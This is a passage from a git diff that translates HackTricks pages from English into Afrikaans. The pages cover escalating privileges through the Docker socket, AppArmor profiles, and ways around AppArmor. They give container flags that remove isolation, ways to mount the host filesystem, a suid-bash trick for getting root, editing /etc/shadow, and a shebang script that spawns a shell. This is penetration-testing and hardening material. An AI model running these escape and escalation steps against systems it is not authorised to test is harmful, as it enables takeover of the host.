**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-There are some occasions were you just have **access to the docker socket** and you want to use it to **escalate privileges**. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges: +Daar is soms geleenthede waar jy net **toegang het tot die Docker-socket** en dit wil gebruik om **voorregte te verhoog**. Sommige aksies kan baie verdag wees en jy wil dit dalk vermy, so hier kan jy verskillende vlae vind wat nuttig kan wees om voorregte te verhoog: -### Via mount +### Via berging -You can **mount** different parts of the **filesystem** in a container running as root and **access** them.\ -You could also **abuse a mount to escalate privileges** inside the container. +Jy kan verskillende dele van die **lêersisteem** in 'n houer wat as root loop **berg** en **toegang** daartoe verkry.\ +Jy kan ook **misbruik maak van 'n berging om voorregte te verhoog** binne die houer. -* **`-v /:/host`** -> Mount the host filesystem in the container so you can **read the host filesystem.** - * If you want to **feel like you are in the host** but being on the container you could disable other defense mechanisms using flags like: - * `--privileged` - * `--cap-add=ALL` - * `--security-opt apparmor=unconfined` - * `--security-opt seccomp=unconfined` - * `-security-opt label:disable` - * `--pid=host` - * `--userns=host` - * `--uts=host` - * `--cgroupns=host` -* \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> This is similar to the previous method, but here we are **mounting the device disk**. Then, inside the container run `mount /dev/sda1 /mnt` and you can **access** the **host filesystem** in `/mnt` - * Run `fdisk -l` in the host to find the `` device to mount -* **`-v /tmp:/host`** -> If for some reason you can **just mount some directory** from the host and you have access inside the host. Mount it and create a **`/bin/bash`** with **suid** in the mounted directory so you can **execute it from the host and escalate to root**. +* **`-v /:/host`** -> Berg die gasheer-lêersisteem in die houer sodat jy die gasheer-lêersisteem kan **lees**. +* As jy wil **voel asof jy op die gasheer is**, maar in die houer is, kan jy ander verdedigingsmeganismes deaktiveer deur vlae soos die volgende te gebruik: +* `--privileged` +* `--cap-add=ALL` +* `--security-opt apparmor=unconfined` +* `--security-opt seccomp=unconfined` +* `-security-opt label:disable` +* `--pid=host` +* `--userns=host` +* `--uts=host` +* `--cgroupns=host` +* \*\*`--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined` \*\* -> Dit is soortgelyk aan die vorige metode, maar hier **berg ons die toesteldisk**. Voer dan binne die houer `mount /dev/sda1 /mnt` uit en jy kan toegang verkry tot die **gasheer-lêersisteem** in `/mnt` +* Voer `fdisk -l` in die gasheer uit om die ``-toestel te vind om te berg +* **`-v /tmp:/host`** -> As jy om een ​​of ander rede net 'n sekere gids van die gasheer kan berg en jy toegang het binne die gasheer. Berg dit en skep 'n **`/bin/bash`** met **suid** in die gebergde gids sodat jy dit van die gasheer kan **uitvoer en na root kan verhoog**. {% hint style="info" %} -Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` +Let daarop dat jy dalk nie die gids `/tmp` kan berg nie, maar jy kan 'n **verskillende skryfbare gids** berg. Jy kan skryfbare gidsies vind deur die volgende te gebruik: `find / -writable -type d 2>/dev/null` -**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. +**Let daarop dat nie al die gidse in 'n Linux-masjien die suid-bit sal ondersteun nie!** Om te bepaal watter gidse die suid-bit ondersteun, voer `mount | grep -v "nosuid"` uit. Byvoorbeeld, gewoonlik ondersteun `/dev/shm`, `/run`, `/proc`, `/sys/fs/cgroup` en `/var/lib/lxcfs` nie die suid-bit nie. -Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +Let ook daarop dat as jy **`/etc`** of enige ander gids **wat konfigurasie-lêers bevat** kan berg, kan jy hulle vanuit die Docker-houer as root verander om hulle in die gasheer te **misbruik en voorregte te verhoog** (dalk deur `/etc/shadow` te wysig) {% endhint %} -### Escaping from the container +### Ontsnapping uit die houer -* **`--privileged`** -> With this flag you [remove all the isolation from the container](docker-privileged.md#what-affects). Check techniques to [escape from privileged containers as root](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape). -* **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work. +* **`--privileged`** -> Met hierdie vlag verwyder jy [alle isolasie uit die houer](docker-privileged.md#what-affects). Kyk na tegnieke om [uit bevoorregte houers as root te ontsnap](docker-breakout-privilege-escalation/#automatic-enumeration-and-escape). +* **`--cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> Om [voorregte te verhoog deur gebruik te maak van funksies](../linux-capabilities.md), **verleen daardie funksie aan die houer** en deaktiveer ander beskermingsmetodes wat die uitbuiting kan voorkom. ### Curl -In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page: +Op hierdie bladsy het ons maniere bespreek om voorregte te verhoog deur gebruik te maak van Docker-vlae, jy kan maniere vind om hierdie metodes te misbruik deur die curl-opdrag op die bladsy te gebruik: {% content-ref url="authz-and-authn-docker-access-authorization-plugin.md" %} [authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md) @@ -59,14 +59,14 @@ In this page we have discussed ways to escalate privileges using docker flags, y
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index e67d3add8..1e7378bb6 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -2,45 +2,44 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -AppArmor is a **kernel enhancement designed to restrict the resources available to programs through per-program profiles**, effectively implementing Mandatory Access Control (MAC) by tying access control attributes directly to programs instead of users. This system operates by **loading profiles into the kernel**, usually during boot, and these profiles dictate what resources a program can access, such as network connections, raw socket access, and file permissions. +AppArmor is 'n **kernel-verbetering wat ontwerp is om die hulpbronne wat beskikbaar is vir programme te beperk deur middel van per-program profiele**, wat effektief Verpligte Toegangsbeheer (MAC) implementeer deur toegangsbeheerkenmerke direk aan programme te koppel in plaas van aan gebruikers. Hierdie stelsel werk deur profiele in die kernel te laai, gewoonlik tydens opstart, en hierdie profiele bepaal watter hulpbronne 'n program kan benader, soos netwerkverbindinge, rou sokkeltoegang en lêertoestemmings. -There are two operational modes for AppArmor profiles: +Daar is twee bedryfsmodusse vir AppArmor-profiel: -- **Enforcement Mode**: This mode actively enforces the policies defined within the profile, blocking actions that violate these policies and logging any attempts to breach them through systems like syslog or auditd. -- **Complain Mode**: Unlike enforcement mode, complain mode does not block actions that go against the profile's policies. Instead, it logs these attempts as policy violations without enforcing restrictions. +- **Handhawingsmodus**: Hierdie modus dwing aktief die beleide wat binne die profiel gedefinieer is, deur aksies wat hierdie beleide oortree te blokkeer en enige pogings om dit te oortree deur stelsels soos syslog of auditd te log. +- **Klaagmodus**: In teenstelling met handhawingsmodus blokkeer klaagmodus nie aksies wat teen die beleide van die profiel ingaan nie. Dit log eerder hierdie pogings as beleidoortredings sonder om beperkings af te dwing. -### Components of AppArmor +### Komponente van AppArmor -- **Kernel Module**: Responsible for the enforcement of policies. -- **Policies**: Specify the rules and restrictions for program behavior and resource access. -- **Parser**: Loads policies into the kernel for enforcement or reporting. -- **Utilities**: These are user-mode programs that provide an interface for interacting with and managing AppArmor. +- **Kernelmodule**: Verantwoordelik vir die handhawing van beleide. +- **Beleide**: Spesifiseer die reëls en beperkings vir programgedrag en hulpbronbenadering. +- **Parser**: Laai beleide in die kernel vir handhawing of verslagdoening. +- **Hulpprogramme**: Dit is gebruikersmodusprogramme wat 'n koppelvlak bied vir interaksie met en bestuur van AppArmor. -### Profiles path +### Profielepad -Apparmor profiles are usually saved in _**/etc/apparmor.d/**_\ -With `sudo aa-status` you will be able to list the binaries that are restricted by some profile. If you can change the char "/" for a dot of the path of each listed binary and you will obtain the name of the apparmor profile inside the mentioned folder. +AppArmor-profiel word gewoonlik gestoor in _**/etc/apparmor.d/**_\ +Met `sudo aa-status` kan jy die bineêre lyste wat deur 'n profiel beperk word, lys. As jy die karakter "/" kan verander na 'n punt van die pad van elke gelysde bineêre lêer, sal jy die naam van die apparmor-profiel binne die genoemde vouer verkry. -For example, a **apparmor** profile for _/usr/bin/man_ will be located in _/etc/apparmor.d/usr.bin.man_ - -### Commands +Byvoorbeeld, 'n **apparmor**-profiel vir _/usr/bin/man_ sal geleë wees in _/etc/apparmor.d/usr.bin.man_ +### Opdragte ```bash -aa-status #check the current status +aa-status #check the current status aa-enforce #set profile to enforce mode (from disable or complain) aa-complain #set profile to complain mode (from diable or enforcement) apparmor_parser #to load/reload an altered policy @@ -48,48 +47,42 @@ aa-genprof #generate a new profile aa-logprof #used to change the policy when the binary/program is changed aa-mergeprof #used to merge the policies ``` +## Skep 'n profiel -## Creating a profile - -* In order to indicate the affected executable, **absolute paths and wildcards** are allowed (for file globbing) for specifying files. -* To indicate the access the binary will have over **files** the following **access controls** can be used: - * **r** (read) - * **w** (write) - * **m** (memory map as executable) - * **k** (file locking) - * **l** (creation hard links) - * **ix** (to execute another program with the new program inheriting policy) - * **Px** (execute under another profile, after cleaning the environment) - * **Cx** (execute under a child profile, after cleaning the environment) - * **Ux** (execute unconfined, after cleaning the environment) -* **Variables** can be defined in the profiles and can be manipulated from outside the profile. For example: @{PROC} and @{HOME} (add #include \ to the profile file) -* **Deny rules are supported to override allow rules**. +* Om die betrokke uitvoerbare lêer aan te dui, word **absoluut paaie en wildcards** toegelaat (vir lêer globbing) om lêers te spesifiseer. +* Om die toegang wat die binêre lêer oor **lêers** sal hê aan te dui, kan die volgende **toegangsbeheerstellings** gebruik word: +* **r** (lees) +* **w** (skryf) +* **m** (geheuekaart as uitvoerbare lêer) +* **k** (lêer sluiting) +* **l** (skep harde skakels) +* **ix** (om 'n ander program uit te voer met die nuwe program wat beleid erf) +* **Px** (uitvoer onder 'n ander profiel, na skoonmaak van die omgewing) +* **Cx** (uitvoer onder 'n kinderprofiel, na skoonmaak van die omgewing) +* **Ux** (uitvoer sonder beperking, na skoonmaak van die omgewing) +* **Veranderlikes** kan in die profiele gedefinieer word en kan van buite die profiel gemanipuleer word. Byvoorbeeld: @{PROC} en @{HOME} (voeg #include \ by die profiel-lêer in) +* **Verbiedingsreëls word ondersteun om toelaatreëls te oorskryf**. ### aa-genprof -To easily start creating a profile apparmor can help you. It's possible to make **apparmor inspect the actions performed by a binary and then let you decide which actions you want to allow or deny**.\ -You just need to run: - +Om maklik 'n profiel te begin skep, kan apparmor jou help. Dit is moontlik om **apparmor die aksies wat deur 'n binêre lêer uitgevoer word te laat ondersoek en dan te besluit watter aksies jy wil toelaat of verbied**.\ +Jy hoef net die volgende uit te voer: ```bash sudo aa-genprof /path/to/binary ``` - -Then, in a different console perform all the actions that the binary will usually perform: - +Dan, in 'n ander konsole, voer al die aksies uit wat die binêre gewoonlik sal uitvoer: ```bash /path/to/binary -a dosomething ``` - -Then, in the first console press "**s**" and then in the recorded actions indicate if you want to ignore, allow, or whatever. When you have finished press "**f**" and the new profile will be created in _/etc/apparmor.d/path.to.binary_ +Dan, druk "**s**" in die eerste konsole en dui dan aan of jy wil ignoreer, toelaat, of watookal met die opgeneemde aksies. Druk "**f**" as jy klaar is en die nuwe profiel sal geskep word in _/etc/apparmor.d/path.to.binary_ {% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever +Met die pyltjiesleutels kan jy kies wat jy wil toelaat/weier/watookal {% endhint %} ### aa-easyprof -You can also create a template of an apparmor profile of a binary with: - +Jy kan ook 'n sjabloon van 'n apparmor-profiel van 'n binêre lêer skep met: ```bash sudo aa-easyprof /path/to/binary # vim:syntax=apparmor @@ -103,42 +96,36 @@ sudo aa-easyprof /path/to/binary # No template variables specified "/path/to/binary" { - #include +#include - # No abstractions specified +# No abstractions specified - # No policy groups specified +# No policy groups specified - # No read paths specified +# No read paths specified - # No write paths specified +# No write paths specified } ``` - {% hint style="info" %} -Note that by default in a created profile nothing is allowed, so everything is denied. You will need to add lines like `/etc/passwd r,` to allow the binary read `/etc/passwd` for example. +Let daarop dat niks standaard toegelaat word in 'n geskepde profiel nie, so alles word ontken. Jy sal lyne soos `/etc/passwd r,` moet byvoeg om die binêre lees `/etc/passwd` byvoorbeeld toe te laat. {% endhint %} -You can then **enforce** the new profile with - +Jy kan dan die nuwe profiel **afdwing** met ```bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary ``` +### Wysiging van 'n profiel vanaf logboeke -### Modifying a profile from logs - -The following tool will read the logs and ask the user if he wants to permit some of the detected forbidden actions: - +Die volgende instrument sal die logboeke lees en die gebruiker vra of hy sommige van die opgespoorde verbode aksies wil toelaat: ```bash sudo aa-logprof ``` - {% hint style="info" %} -Using the arrow keys you can select what you want to allow/deny/whatever +Deur die pyltjiesleutels te gebruik, kan jy kies wat jy wil toelaat/weier/enigiets {% endhint %} -### Managing a Profile - +### Bestuur van 'n Profiel ```bash #Main profile management commands apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode @@ -146,18 +133,14 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile ``` +## Logboeke -## Logs - -Example of **AUDIT** and **DENIED** logs from _/var/log/audit/audit.log_ of the executable **`service_bin`**: - +Voorbeeld van **AUDIT** en **DENIED** logboeke van die uitvoerbare lêer **`service_bin`** in _/var/log/audit/audit.log_: ```bash type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 ``` - -You can also get this information using: - +Jy kan ook hierdie inligting bekom deur gebruik te maak van: ```bash sudo aa-notify -s 1 -v Profile: /bin/service_bin @@ -175,127 +158,105 @@ Logfile: /var/log/audit/audit.log AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021) For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor ``` - ## Apparmor in Docker -Note how the profile **docker-profile** of docker is loaded by default: - +Merk op hoe die profiel **docker-profiel** van Docker standaard gelaai word: ```bash sudo aa-status apparmor module is loaded. 50 profiles are loaded. 13 profiles are in enforce mode. - /sbin/dhclient - /usr/bin/lxc-start - /usr/lib/NetworkManager/nm-dhcp-client.action - /usr/lib/NetworkManager/nm-dhcp-helper - /usr/lib/chromium-browser/chromium-browser//browser_java - /usr/lib/chromium-browser/chromium-browser//browser_openjdk - /usr/lib/chromium-browser/chromium-browser//sanitized_helper - /usr/lib/connman/scripts/dhclient-script - docker-default +/sbin/dhclient +/usr/bin/lxc-start +/usr/lib/NetworkManager/nm-dhcp-client.action +/usr/lib/NetworkManager/nm-dhcp-helper +/usr/lib/chromium-browser/chromium-browser//browser_java +/usr/lib/chromium-browser/chromium-browser//browser_openjdk +/usr/lib/chromium-browser/chromium-browser//sanitized_helper +/usr/lib/connman/scripts/dhclient-script +docker-default ``` +Standaard word die **Apparmor docker-default profiel** gegenereer vanaf [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -By default **Apparmor docker-default profile** is generated from [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +**docker-default profiel opsomming**: -**docker-default profile Summary**: - -* **Access** to all **networking** -* **No capability** is defined (However, some capabilities will come from including basic base rules i.e. #include \ ) -* **Writing** to any **/proc** file is **not allowed** -* Other **subdirectories**/**files** of /**proc** and /**sys** are **denied** read/write/lock/link/execute access -* **Mount** is **not allowed** -* **Ptrace** can only be run on a process that is confined by **same apparmor profile** - -Once you **run a docker container** you should see the following output: +* **Toegang** tot alle **netwerkverbindings** +* **Geen bevoegdheid** is gedefinieer (Sommige bevoegdhede sal egter kom van die insluiting van basiese basisreëls, d.w.s. #include \) +* **Skryf** na enige **/proc** lêer is **nie toegelaat** +* Ander **subdossiers**/**lêers** van /**proc** en /**sys** word **ontken** lees/skryf/vergrendel/skakel/uitvoer toegang +* **Monteer** is **nie toegelaat** +* **Ptrace** kan slegs uitgevoer word op 'n proses wat beperk word deur dieselfde apparmor profiel +Sodra jy 'n **docker houer uitvoer**, behoort jy die volgende uitset te sien: ```bash 1 processes are in enforce mode. - docker-default (825) +docker-default (825) ``` - -Note that **apparmor will even block capabilities privileges** granted to the container by default. For example, it will be able to **block permission to write inside /proc even if the SYS\_ADMIN capability is granted** because by default docker apparmor profile denies this access: - +Let wel dat **apparmor selfs blokkeer bevoegdhede-voorregte** wat aan die houer verleen word. Byvoorbeeld, dit sal in staat wees om **toestemming om binne /proc te skryf te blokkeer selfs as die SYS\_ADMIN bevoegdheid verleen word**, omdat die standaard docker apparmor-profiel hierdie toegang ontken: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash echo "" > /proc/stat sh: 1: cannot create /proc/stat: Permission denied ``` - -You need to **disable apparmor** to bypass its restrictions: - +Jy moet **apparmor deaktiveer** om sy beperkings te omseil: ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash ``` +Let daarop dat **AppArmor** standaard ook die houer verbied om van binne af vouers te monteer, selfs met die SYS\_ADMIN-vermoë. -Note that by default **AppArmor** will also **forbid the container to mount** folders from the inside even with SYS\_ADMIN capability. +Let daarop dat jy **vermoëns** kan **byvoeg/verwyder** aan die docker-houer (dit sal steeds beperk word deur beskermingsmetodes soos **AppArmor** en **Seccomp**): -Note that you can **add/remove** **capabilities** to the docker container (this will be still restricted by protection methods like **AppArmor** and **Seccomp**): - -* `--cap-add=SYS_ADMIN` give `SYS_ADMIN` cap -* `--cap-add=ALL` give all caps -* `--cap-drop=ALL --cap-add=SYS_PTRACE` drop all caps and only give `SYS_PTRACE` +* `--cap-add=SYS_ADMIN` gee `SYS_ADMIN`-vermoë +* `--cap-add=ALL` gee alle vermoëns +* `--cap-drop=ALL --cap-add=SYS_PTRACE` verwyder alle vermoëns en gee slegs `SYS_PTRACE` {% hint style="info" %} -Usually, when you **find** that you have a **privileged capability** available **inside** a **docker** container **but** some part of the **exploit isn't working**, this will be because docker **apparmor will be preventing it**. +Gewoonlik, as jy **vind** dat jy 'n **bevoorregte vermoë** binne 'n **docker**-houer het, maar 'n deel van die **aanval nie werk nie**, sal dit wees omdat docker **apparmor dit voorkom**. {% endhint %} -### Example +### Voorbeeld -(Example from [**here**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) - -To illustrate AppArmor functionality, I created a new Docker profile “mydocker” with the following line added: +(Voorbeeld vanaf [**hier**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)) +Om die AppArmor-funksionaliteit te illustreer, het ek 'n nuwe Docker-profiel "mydocker" geskep met die volgende lyn bygevoeg: ``` deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) ``` - -To activate the profile, we need to do the following: - +Om die profiel te aktiveer, moet ons die volgende doen: ``` sudo apparmor_parser -r -W mydocker ``` - -To list the profiles, we can do the following command. The command below is listing my new AppArmor profile. - +Om die profiele te lys, kan ons die volgende opdrag gebruik. Die opdrag hieronder lys my nuwe AppArmor-profiel. ``` $ sudo apparmor_status | grep mydocker - mydocker +mydocker ``` - -As shown below, we get error when trying to change “/etc/” since AppArmor profile is preventing write access to “/etc”. - +Soos hieronder getoon, kry ons 'n fout wanneer ons probeer om "/etc/" te verander, aangesien die AppArmor-profiel skryftoegang tot "/etc" voorkom. ``` $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname chmod: /etc/hostname: Permission denied ``` +### AppArmor Docker Omspring1 -### AppArmor Docker Bypass1 - -You can find which **apparmor profile is running a container** using: - +Jy kan vind watter **apparmor-profiel 'n houer laat loop** deur die volgende te gebruik: ```bash docker inspect 9d622d73a614 | grep lowpriv - "AppArmorProfile": "lowpriv", - "apparmor=lowpriv" +"AppArmorProfile": "lowpriv", +"apparmor=lowpriv" ``` - -Then, you can run the following line to **find the exact profile being used**: - +Dan kan jy die volgende lyn uitvoer om die presiese profiel wat gebruik word te vind: ```bash find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null ``` +In die vreemde geval kan jy die apparmor docker-profiel wysig en dit herlaai. Jy kan die beperkings verwyder en dit "omseil". -In the weird case you can **modify the apparmor docker profile and reload it.** You could remove the restrictions and "bypass" them. +### AppArmor Docker Omseiling 2 -### AppArmor Docker Bypass2 +AppArmor is pad-gebaseer, dit beteken dat selfs al beskerm dit dalk lêers binne 'n gids soos `/proc`, as jy kan konfigureer hoe die houer uitgevoer gaan word, kan jy die proc-gids van die gasheer binne `/host/proc` monteer en dit sal nie meer deur AppArmor beskerm word nie. -**AppArmor is path based**, this means that even if it might be **protecting** files inside a directory like **`/proc`** if you can **configure how the container is going to be run**, you could **mount** the proc directory of the host inside **`/host/proc`** and it **won't be protected by AppArmor anymore**. - -### AppArmor Shebang Bypass - -In [**this bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) you can see an example of how **even if you are preventing perl to be run with certain resources**, if you just create a a shell script **specifying** in the first line **`#!/usr/bin/perl`** and you **execute the file directly**, you will be able to execute whatever you want. E.g.: +### AppArmor Shebang Omseiling +In [hierdie fout](https://bugs.launchpad.net/apparmor/+bug/1911431) kan jy 'n voorbeeld sien van hoe selfs al voorkom jy dat perl uitgevoer word met sekere hulpbronne, as jy net 'n skulpskrip skep wat in die eerste lyn **`#!/usr/bin/perl`** spesifiseer en jy voer die lêer direk uit, sal jy in staat wees om enigiets uit te voer. Byvoorbeeld: ```perl echo '#!/usr/bin/perl use POSIX qw(strftime); @@ -305,17 +266,16 @@ exec "/bin/sh"' > /tmp/test.pl chmod +x /tmp/test.pl /tmp/test.pl ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md index 3357d629d..8859d0341 100644 --- a/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md +++ b/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md @@ -1,90 +1,83 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 